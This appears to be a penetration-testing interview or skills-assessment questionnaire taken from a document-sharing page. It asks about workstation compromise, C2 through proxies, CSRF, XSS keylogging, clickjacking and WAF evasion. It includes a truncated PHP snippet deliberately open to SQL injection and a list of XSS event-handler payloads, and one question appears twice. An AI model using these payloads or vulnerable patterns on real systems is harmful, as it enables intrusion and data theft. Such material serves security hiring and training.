Академический Документы
Профессиональный Документы
Культура Документы
3. Name 5 common methods with high success rates for compromising an MS workstation
in an internal assessment.
6. How do viruses and malware communicate to their command and control server
within an environment which uses a transparent proxy with AD authentication?
Please provide as much technical details in your answer as possible and mention as
many technique that you know of
9. Name two different methods for protecting against buffer and stack overflows
other than patching. The required solution should be on a Microsoft system
10. Consider a WIFI assessment. your target is the CEO's wireless access point
residing at the 12th floor. given you are not allowed to physically go to that
floor,
how can you compromise the wireless network considering the far distance?
11. Assume that you are performing a web based penetration test. Also consider that
you have no knowledge of the server's PHP code nor database structure.
Describe your step by step approach (with technical details) on how to retrieve the
application's username and password.
Consider the below hints baring in mind that we are assuming you do not know this
info so your answer must be as per to this assumption.Those details are merely
provided to you for the sake of constructing your scenario.
Hint 1: The member's table name is "users" the username column name is "username",
the password column name is "password".
Hint 2: Below is the target server code:
<?php
if (isset($_GET['Submit']))
{
// Retrieve article
$page_id = $_GET['page_id'];
$page_id = mysql_real_escape_string($page_id);
$title=mysql_result($result,0,"page_title");
$body=mysql_result($result,0,"page_body");
13. Provide us with code that executes a cross site request forgery based on a
"POST" request
14. Assume you were able to inject JavaScript into the target website (stored XSS).
Your goal is to use JQUERY (to be stealthy) and gather the key strokes of the
victim, once the user clicks any submit button on the infected page,
you want to send the logged key strokes to your malicious website. You cannot use
$.ajax() nor $.post() due to cross domain restrictions in all modern browsers.
Describe a method on which you can bypass that through JQUERY in order to remain
stealthy.
Assume you were able to inject JavaScript into the target website (stored XSS).
Your goal is to use
JQUERY (to be stealthy) and gather the key strokes of the victim, once the user
clicks any submit button on the infected page,
you want to send the logged key strokes to your malicious website. You cannot use
$.ajax() nor $.post() due to cross domain restrictions
in all modern browsers. Describe a method on which you can bypass that through
JQUERY in order to remain stealthy.
15. What are the risks of allowing your web application to be loaded within an
IFRAME of another FQDN?
16. Provide as many examples (that work on a fully patched browser) for injecting
JavaScript without using script tags
17. Assume you are performing a web based vulnerability assessment. You found that
when passing the following value on your request "xxxxxxxxxxxxxx" you
are observing that it's getting reflected within an image tag like so:
" onmouseover="alert(123)
" onclick="alert(123)
" onclick="alert(123)
" ondblclick="alert(123)
" onmousedown="alert(123)
" onmousemove="alert(123)
" onmouseout="alert(123)
" onmouseup="alert(123)
" onkeydown="alert(123)
" onkeypress="alert(123)
" onkeyup="alert(123)
However all were blocked by a web application firewall. Assuming the above evens
are all the events that the WAF would block and it also blocks ">" character.
18. Provide us with an IFRAME code that can be used for clickjacking. We are not
specific about what you need to clickjack, just show us an example of any site of
choice.